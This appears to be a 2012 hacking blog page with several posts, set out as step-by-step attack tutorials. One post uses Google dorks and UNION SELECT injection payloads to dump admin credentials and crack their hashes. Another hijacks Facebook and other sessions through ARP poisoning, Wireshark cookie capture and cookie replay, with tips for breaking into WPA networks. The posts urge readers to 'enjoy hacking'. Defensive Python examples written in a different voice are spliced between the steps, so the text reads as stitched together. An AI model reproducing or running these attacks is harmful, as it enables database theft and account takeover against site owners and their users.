Sunday 30 December 2012

Website Hacking: How to find a vulnerable Website?? Part 2

In my last article I covered the basic information about website hacking. Today's article is "How to find a vulnerable Website using Dorks". Nowadays website hacking has become a tradition, done for fun or to cause problems for other people, and hackers search for holes in websites that have high page rank and traffic.

In this article I am going to show you how to find website vulnerabilities using dorks. I have shared some dorks below which you can use to find vulnerable websites through Google.

If you have not read part 1 I strongly recommend you do: Website Hacking: Basic Information About Website Hacking Part 1




How to find a vulnerable Website Using Dork?

What is an SQL Injection?

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

How do I know if the site is vulnerable?

Well, the most basic way to do it, and the easiest, would be to use an SQLi scanner such as Acunetix Web Vulnerability Scanner.

Alternatively, you can search manually using something called a "Dork".

So what is a dork?

A dork is a simple search used on google ( or other search engines ) that brings up sites you are specifically looking for.

List of Google Dork:
  inurl:index.php?id=
  inurl:trainers.php?id=
  inurl:buy.php?category=
  inurl:article.php?ID=
  inurl:play_old.php?id=
  inurl:declaration_more.php?decl_id=
  inurl:Pageid=
  inurl:games.php?id=
  inurl:page.php?file=
  inurl:historialeer.php?num=

Using the manual method will take a lot of trial and error.

Once you have your site, to check if it is vulnerable, simply add an apostrophe ( ' ) to the end of the URL.

Example:
  http://www.examplesite.com/category.php?id=5'

If the site is vulnerable, you will see the following error or something similar somewhere on the page.

" Error executing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY date_added DESC' at line 1 "

If you get this, the site should be vulnerable. So far so good!

How many columns?


Our next step is to find the number of columns. To do this we use ORDER BY: take the normal site URL and add ORDER BY 1-- to the end of it. Example:

  http://www.examplesite.com/category.php?id=5 order by 1--

The page should then show up as normal. Now we have to increase this number until we get an error.

  http://www.examplesite.com/category.php?id=5 order by 1--   No error
  http://www.examplesite.com/category.php?id=5 order by 2--   No error
  http://www.examplesite.com/category.php?id=5 order by 3--   Error

We got an error on 3, so our number of columns is 2 (the highest column number that does not produce an error).

Union Select Query

We use the UNION SELECT statement to combine the results of multiple queries in our SQLi. To test whether it works, go to the site's normal URL and write "union select 1,2--" (without quotes) after it. In our example we use 1,2--, but on other sites you will usually have a different number of columns. Example: on a site with 5 columns it would be "union select 1,2,3,4,5--".

  http://www.examplesite.com/category.php?id=-5 union select 1,2--

Notice that there is a - in front of the 5. This is done to remove the page's own text so that we can see the results of our query on the page (there is no page with id -5 anywhere on the site, so it renders the usual site template but without the images and text of that specific page).

If union select worked, we should have no SQL errors. We also should now see a few numbers on the page that normally aren't there. For our example, we will say that both 1 and 2 showed up on our page.

What SQL Version does my site use?

This is one of the easier things to do. After we have tested union (and it works!) we simply put "version()" in place of one of the numbers in our URL. The number we replace has to be one that is visible on the page, otherwise we won't be able to see the returned query result. Example:

  http://www.examplesite.com/category.php?id=-5 union select 1,version()--

This replaces the number 2 on our page with the SQL version. For our example we assume version 5 or above, which the information_schema queries below require.

Finding table names

Now we are going to get into the tables. This is where all the information you are looking for is kept, but first we need to find the table names. To do so, replace version() with group_concat(table_name), then after your last column number add from information_schema.tables--. Example:

  http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(table_name) from information_schema.tables--

On the page you should now have a list of all the table names in the database.

Finding the column names

To find the column names we do the same thing, but replace tables with columns and add a WHERE clause naming the table we want the column names from. Suppose we found a table called admin. Example:

  http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--

Q: I get an error when I do this, or no column names are shown!

A: Magic quotes are on. To bypass this, you must convert the table name to hex.
You can do this by going to http://www.swingnote.com/tools/texttohex.php . Our query would now look like this:

  http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e --

Note: the 0x prefix tells MySQL that the following string is a hex literal.

Let's say the column names were username and password.

Final Step: Getting our information.

To finish it off, we want to find out what the columns contain, otherwise this has all been for nothing! To do so we take our normal site URL and add "union select 1,concat(username,0x3a,password) from admin--".

This will show the username and password from the table admin! Usually the password will be a hash, so you can use an online MD5 cracker such as MD5Crack, or a program such as Cain and Abel, to crack the password hash.
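The whole procedure above comes down to one coding mistake: the id parameter is pasted into the SQL string. This added example (not code from the original post) reproduces the apostrophe test, the ORDER BY probe and the UNION probe against an in-memory SQLite table, and shows the parameterised query that makes all three harmless. The category and admin tables, rows and placeholder hash are constructed for the demo.

```python
"""Added example: the vulnerable query pattern behind category.php?id=...,
beside its hardened form. Schema and rows below are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema; the admin row holds a placeholder, not a real hash."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE category (id INTEGER, name TEXT);
        INSERT INTO category VALUES (5, 'Books'), (6, 'Games');
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO admin VALUES ('root', 'PLACEHOLDER_HASH');
        """
    )
    return con


def vulnerable_lookup(con: sqlite3.Connection, raw_id: str) -> list:
    """The flawed pattern: user input concatenated straight into the SQL text.
    Anything after the number (quote, ORDER BY, UNION) is parsed as SQL."""
    sql = "SELECT id, name FROM category WHERE id=" + raw_id
    return con.execute(sql).fetchall()


def hardened_lookup(con: sqlite3.Connection, raw_id: str) -> list:
    """The fix: enforce the expected type, then bind the value as a parameter
    so the database engine only ever sees it as data."""
    try:
        cid = int(raw_id)
    except ValueError:
        return []  # reject anything that is not an integer id
    return con.execute("SELECT id, name FROM category WHERE id=?", (cid,)).fetchall()


def probe(raw_id: str) -> dict:
    """Run one id value through both lookups and report what each did."""
    con = make_db()
    out = {}
    try:
        out["vulnerable"] = vulnerable_lookup(con, raw_id)
    except sqlite3.OperationalError as exc:
        out["vulnerable"] = "SQL error: " + str(exc)  # the tell-tale error page
    out["hardened"] = hardened_lookup(con, raw_id)
    return out


if __name__ == "__main__":
    for value in ("5", "5'", "5 order by 2--", "5 order by 3--", "-5 union select 1,2--"):
        print(repr(value), probe(value))
```

With the hardened lookup the apostrophe, ORDER BY and UNION inputs are all rejected before they reach the database, so none of the error-message signals the tutorial relies on ever appear.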

So friends, I hope you will like this.

Enjoy Website Hacking ........


Website Hacking: Basic Information About Website Hacking Part 1


Website security is a major problem today and should be a priority for any organization or webmaster. Nowadays hackers are concentrating a lot of their effort on finding holes in web applications, and if you own a website with a high page rank and high traffic there is a chance that you will be a victim of these hackers.

A few years back there were no proper tools for finding vulnerabilities, but nowadays there are tons of tools available, such as SQL injection scanners, with which even a newbie can find a vulnerable site and start hacking within a few minutes.





What is website hacking?

The files of your website are stored on a computer somewhere. The computer, called a "server" or "web server", is not too much different from your home PC, except that its configuration is specialized for making files available to the world wide web, so it has a lot of hard drive capacity and a very high speed internet connection. It probably doesn't have its own monitor or keyboard because everyone who communicates with it does so through its internet connection, just like you do.

With everybody connecting to your site through the internet, it might seem like just an accident if one of your files gets changed once in a while in all the commotion, but it's not.

Your website and server have several security systems that determine what kind of access each person has. You are the owner, so you have passwords that give you read/write access to your site. You can view files (read) and you can also change them (write). Everybody else only has read access. They can view your files, but they are never, ever supposed to be able to change them, delete them, or add new ones.

A hack occurs when somebody gets through these security systems and obtains write access to your server, the same kind you have. Once they obtain that, they can change, add, or delete files however they want. If you can imagine someone breaking into your home and sitting down at your PC with a box of installation CDs, that's what a website hack is like. They might do only a little damage, or a lot. The choice is up to them.

People often ask, "But how could my page, which was 100% pure HTML, have been hacked?"

The answer is that the defacement of the page wasn't the hack. The hack was when they got write access to the server. The "pure HTML" page had nothing at all to do with that.

Altering the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING, including alter your pages that are pure HTML. That is the reason why, after a hack, the most important thing isn't repairing the damage they did (which most people focus on), but finding out how they got in.

Who are the hackers?

Website hacking is one of the modern enterprises of organized crime, but if you think that means it's being done amateurishly by a bunch of elderly mobsters who took night classes in Computer ABC's to learn what "this Internet Explore thing is", think again. These organizations have professional programmers. Their campaigns to take control of thousands of the world's computers are well planned and sophisticated, drawing on an in-depth knowledge of operating system software, browser vulnerabilities, programming, and even psychology, and their attacks are almost always automated.

Strangely enough, if your site was hacked, it probably wasn't done by a person, but by another computer, which was hacked by another computer, which was hacked by yet another, and somewhere way back in the chain is a programmer who initially unleashed the sequence of events that set all these computers to attacking each other and building a giant network, a "botnet", a massively parallel virtual supercomputer whose purpose is to suck up all of the world's information that the criminals can efficiently turn into money. They need to have as many computers as possible recruited into the enterprise, and that's why they wanted to hack your little website.

Other hackers do it, whether they realize it or not, as affiliates of organized crime. Using tools provided by the larger organization, they get a small commission ($5, last I heard) for each website they successfully break into.

And there are still hackers who are motivated by fun, challenge, and prestige among their peers or by the desire to deface the site of someone they dislike, but their numbers and impact today are dwarfed by the commercial robotic crawling operations.

Why do they do it? What do they want?


  • Your visitors' confidential financial information. They want credit card and Social Security numbers, FTP passwords, website logins, and other information from the people who trustingly visit your site. Credit card numbers are sold in bulk to brokers who resell them. More complete financial information is used in identity theft schemes involving mortgages or car loans.
    Theft methods:
    1. They install malicious content on your website so that your visitors are attacked with viruses, Trojans, keyloggers, and other spyware. Once on the PCs, the malware either searches for the data it wants, or keyloggers capture passwords as users log into their bank accounts. The stolen data is relayed to remote computers using the victim's internet connection. In spite of the availability of antivirus and antispyware software, many home PCs are still poorly protected, and one of the sophisticated attack packages (MPack) claims that it successfully infects 50% of the computers it attacks.
    2. They copy your customer database.
    3. They install spyware or phishing pages in your site, to grab data as your customers log in.
  • Use of your visitors' computers. When they got into your server, they took control of one computer, but now they can attack all your visitors, too, and maybe get hundreds or thousands of new zombie computers under their control. One of the things that makes your server an attractive target is the opportunity to attack all these poorly protected PC's.
  • Your mail server, for sending spam.
  • Your server's high-speed internet connection, for relaying stolen data, spamming, communicating with other sites in a botnet, crawling the web searching for new websites to victimize, and attacking them.
  • Free use of your server's processing power, to reprogram however they want.
  • Free use of your webspace, to host illegal content or even an entire illegal website. They avoid webhosting fees, electricity bills, and can engage in activities that no webhost would allow, leaving you with the worries about TOS violations and legal liability. Even after you clean up the site and remove the content, it may remain indexed by search engines for months. Examples:
    1. Phishing sites: they create a fake (spoof) site that looks like a popular one such as PayPal. Then they send spam emails containing links to the phishing page on your site. When victims log in, thinking it's PayPal, your site steals their login data and relays it to a remote computer. Then the thieves log into the real PayPal accounts and steal the money.
    2. Illegal pornographic content.
    3. Use of your webspace to store PHP or Perl scripts like c99 or r57 for use in Remote File Inclusion (RFI) attacks on other sites, making your site look like the attacker.
  • Your traffic. They put visible links on your pages that visitors on your site can follow. Or they install code to redirect all of your traffic to a different site. Either way, your visitors become their visitors.
  • Your money, by extortion, threatening to launch a worse attack against your site if you don't pay them.
  • Your PageRank. By putting invisible outbound links on your pages (so only search engines see them) they inflate another site's inbound links and boost its PageRank. Appearing higher in search results makes more money for them.
  • Your advertising space. They monetize your popularity by inserting their ads onto your pages. Clicks are credited to them.


Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website, but the most common ones are as follows:

SQL Injection
Cross Site Scripting (XSS)
Remote File Inclusion(RFI)
Local File inclusion(LFI)
Directory Traversal
Cross-site request forgery( CSRF )
SSI Injection
LDAP Injection
XPath Injection
Denial of Service - DOS Attacks

In this article I have just shared basic information on website hacking. I will cover the methods used to hack websites in the next post, so stay tuned!

Website Hacking: How to find a vulnerable Website?? Part 2

NetCat - Tutorial


Netcat:
NetCat is a networking utility for reading from and writing to network connections using TCP or UDP. Netcat has many features and is therefore commonly referred to as the Swiss army knife of TCP/IP. Netcat is cross-platform and is mainly used by hackers for banner grabbing, port scanning, as a backdoor and for proxying; it has many features that come in handy in day-to-day work.
In today's post I will be explaining the various features and uses of Netcat. Netcat can be used to do the following things:


1. Chatting
2. Port scanning
3. Banner Grabbing
4. Used for remote administration (Can be used as Backdoor )
5. File transferring



Hope this will help you. 

Monday 24 December 2012

Hack A Facebook Account In Same Network


First off I need to say that this will NOT steal anyone's password unless they log in while you are monitoring them. This will however give you their cookies, which you can use to steal their session and have full access to their account. This will work for Facebook, a lot of email providers (sorry, no Gmail), and just about any forum (except this one). If you are familiar with SSLstrip you can use this method to hijack any session (PayPal, bank websites, any email, etc.)




Wireshark Software to capture cookies:

Wireshark is the best free packet sniffer available today. It was developed for making networks secure, but the same software is now used by hackers to test for vulnerabilities and security loopholes in a network and to attack the network accordingly. Cookie stealing is one of the hacks carried out using Wireshark.




Requirements:


Cain and Abel : Download Here
Wireshark : Download Here
Firefox 3 (or one compatible with Add n Edit) : Download Here
Add n Edit (cookie editor for Firefox) : Download Here
Access to the network of the user you want to hack
Network traffic



You can also use the Greasemonkey add-on.


Prerequisites:
Download and install all of the above programs. To add "Add n Edit" to your browser, open Firefox, go to Tools, then click Add-ons. You can drag and drop the program from wherever you saved it into the box that pops up and install it from there.

Below, I have listed steps on how to capture Facebook and other accounts cookies. This will help you to know how Wireshark and Cain-Abel can be used to sniff packets and capture cookies.




First: Gain access to the network. Open networks or your own network are easy, but if you have a specific slave you want, you should be able to gain access using BackTrack.

Tip: use Reaver to exploit WPS on WPA/WPA2 networks; WEP is easy to crack given time, and OPN means there is no password.

Second: Right-click Cain and choose 'Run as administrator'. On the top bar go to 'Configure' and be sure to select your wireless card/adapter. Now click where it says 'Sniffer', then this little button towards the top left:







Next click any empty white box, then the blue "+" symbol near the button you pressed just before, and choose OK.
It should look like this:







These are all the devices it was able to detect.


Now we go to APR on the bottom bar. Once again click any empty white box, then the blue cross. It's easiest to just go one by one and choose all possibilities.






Now we have to poison them, so we choose the little yellow hazard symbol towards the top left. It should now look like this:




We are done here; just minimize Cain for now.
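The APR step above rewrites the victims' ARP tables so that the gateway's IP resolves to the attacking machine's MAC. That is also exactly how a defender notices it: compare ARP-table snapshots and watch for a gateway whose MAC changes, or one MAC claimed by several IPs. This added example (not from the original post) does that over `arp -a` output; the two snapshots and all addresses in it are constructed.

```python
"""Added example: spotting ARP poison routing from the victim's side by
diffing ARP-table snapshots. Snapshots and addresses are constructed."""
import re
from collections import defaultdict

# Matches the rows of `arp -a` on Windows (xx-xx-xx-...) and Linux/macOS (xx:xx:xx:...).
ROW = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})")


def parse_arp(text: str) -> dict:
    """Return {ip: mac} from `arp -a` output; MACs normalised to lower-case colons."""
    table = {}
    for m in ROW.finditer(text):
        table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table


def shared_macs(table: dict) -> dict:
    """MACs that more than one IP resolves to. After APR the gateway and the
    attacking host both map to the attacker's MAC, which is the classic symptom."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def changed_entries(baseline: dict, current: dict) -> list:
    """(ip, old_mac, new_mac) for every host whose MAC differs from the baseline."""
    return [(ip, baseline[ip], current[ip])
            for ip in sorted(baseline) if ip in current and current[ip] != baseline[ip]]


def alerts(baseline_text: str, current_text: str, gateway: str) -> list:
    """Human-readable findings; an empty list means nothing suspicious."""
    base, cur = parse_arp(baseline_text), parse_arp(current_text)
    out = []
    for ip, old, new in changed_entries(base, cur):
        tag = "GATEWAY" if ip == gateway else "host"
        out.append(f"{tag} {ip} changed MAC {old} -> {new}")
    for mac, ips in shared_macs(cur).items():
        out.append(f"MAC {mac} claimed by {', '.join(ips)}")
    return out


# Constructed snapshots: the second is what the victim's table looks like while
# the machine at 192.168.1.20 is poisoning the gateway entry.
BASELINE = """Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.20          aa-bb-cc-dd-ee-ff     dynamic
"""
POISONED = """Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.20          aa-bb-cc-dd-ee-ff     dynamic
"""

if __name__ == "__main__":
    for line in alerts(BASELINE, POISONED, gateway="192.168.1.1"):
        print(line)
```

A static ARP entry for the gateway, or switch-side dynamic ARP inspection, stops the poisoning itself; this script only tells you it is happening.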

Third: Run Wireshark as administrator. On the top bar choose 'Capture' then 'Interfaces'. Here you have to choose the interface that is connected to the network we are sniffing from. If you wait a few seconds you might see some traffic being collected, as seen in my photo; just choose that interface, because that's most likely it.



Wireshark will list and color-code all the traffic it sees. To make this simpler we can use the filter to only see the traffic we want: type "http.cookie" in the filter. (Something to consider is to just filter on "http" and scroll through the entries looking for ones that start with the word "POST"; this means that information such as a username and password was submitted to the webpage noted, so if you see this, look through the details and you should see the info you want. Most passwords will be hashed, but use this site to decrypt them: http://www.md5decrypter.co.uk/ )

Here is an image:



You can either look through this information manually or use the search function to find what you want. In my case I want to hijack the session of a user on the forum freerainbowtables.com, so I will use the search function (press Ctrl+F, or go to Edit -> Search) and type in the information I know for sure will be in the entry. If you're hijacking someone's Facebook, put 'facebook' there. Most of the time, to be safe, I do not use the first entry I see, because this will only work if the person is auto-logged in, so just go down a few more until you see one you think will work (just use common sense).



What we need are the cookies. Here is what mine look like and how to get there. With practice you will be able to tell which cookies are used for logins and be able to limit failed attempts.




Copy the cookies as value and save them into Notepad (shown in the picture above). I suggest separating them everywhere you see a ";", because this marks the beginning of the next entry. The text to the left of the = is the name of the cookie and the text to the right is its value.

Fourth: Open up your Firefox browser with Add n Edit enabled. You can get to your add-ons by going to Tools; they should all be listed in the drop-down tab. First go to the website you are hijacking the session from, then open your cookie editor. It should look something like this:






The last thing to do is to change your cookies to match the ones you captured. If the cookies given to you by the site expire (like the ones in my picture do) you will have to delete them and add in all the ones we captured earlier; if they do not expire you can just edit them. Bottom line: all the cookies must match the cookies you captured in the earlier steps EXACTLY! Make sure you do not add any extras and that you did not miss anything. Also, all fields must be filled in (Path and Domain as well as Name and Value). My path is "/" and my domain is ".freerainbowtables.com".
Mine looks like this:





You are now done. Just close the cookie editor and reload the webpage. If done correctly with the correct cookies you should be logged in as the user you attacked!
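Everything in this tutorial depends on the site handing out a login cookie that travels in cleartext and stays valid for a long time. This added example (not from the original post) audits a site's own Set-Cookie headers for exactly those properties: a session-looking cookie without the Secure flag (sent over plain HTTP, so Wireshark sees it), without HttpOnly, without SameSite, or with a far-future Expires (the "auto logged in" case the text relies on). The HTTP response, cookie names and the reference date are constructed.

```python
"""Added example: auditing Set-Cookie headers for the weaknesses that make
session-cookie capture work. Response, names and date are constructed."""
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

# Cookie names that look like they carry a login; others are left alone.
SESSION_HINTS = ("sess", "sid", "auth", "login", "token")


def parse_set_cookie(header: str) -> dict:
    """Split 'name=value; Attr; Attr=val' into name, value and a lower-cased attribute map."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return {"name": name.strip(), "value": value, "attrs": attrs}


def audit_cookie(cookie: dict, now: datetime) -> list:
    """Findings for one cookie; only session/auth-looking cookies are checked."""
    if not any(h in cookie["name"].lower() for h in SESSION_HINTS):
        return []
    a, name, findings = cookie["attrs"], cookie["name"], []
    if "secure" not in a:
        findings.append(f"{name}: no Secure flag, sent over plain HTTP and sniffable")
    if "httponly" not in a:
        findings.append(f"{name}: no HttpOnly flag, readable by injected script")
    if "samesite" not in a:
        findings.append(f"{name}: no SameSite attribute")
    if "expires" in a:
        exp = parsedate_to_datetime(a["expires"])
        if exp - now > timedelta(days=30):
            findings.append(f"{name}: persists {(exp - now).days} days, stays valid if captured")
    return findings


def audit_response(raw: str, now: datetime) -> list:
    """Audit every Set-Cookie header in a raw HTTP response head."""
    findings = []
    for line in raw.splitlines():
        if line.lower().startswith("set-cookie:"):
            findings += audit_cookie(parse_set_cookie(line.split(":", 1)[1]), now)
    return findings


# Constructed response: one weak login cookie (the kind the tutorial captures),
# one correctly flagged token, and a harmless preference cookie.
RESPONSE = """HTTP/1.1 200 OK
Set-Cookie: login_session=abc123; Path=/; Domain=.example.com; Expires=Wed, 25 Dec 2013 00:00:00 GMT
Set-Cookie: auth_token=def456; Path=/; Secure; HttpOnly; SameSite=Lax
Set-Cookie: theme=dark; Path=/
"""
NOW = datetime(2012, 12, 24, tzinfo=timezone.utc)  # constructed reference date

if __name__ == "__main__":
    for finding in audit_response(RESPONSE, NOW):
        print(finding)
```

Serving the whole site over HTTPS with HSTS is what actually removes the cleartext cookie, and it also closes the SSLstrip variant mentioned at the top of the post; the Secure flag is the check that the cookie never leaves that channel.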


Enjoy hacking.!!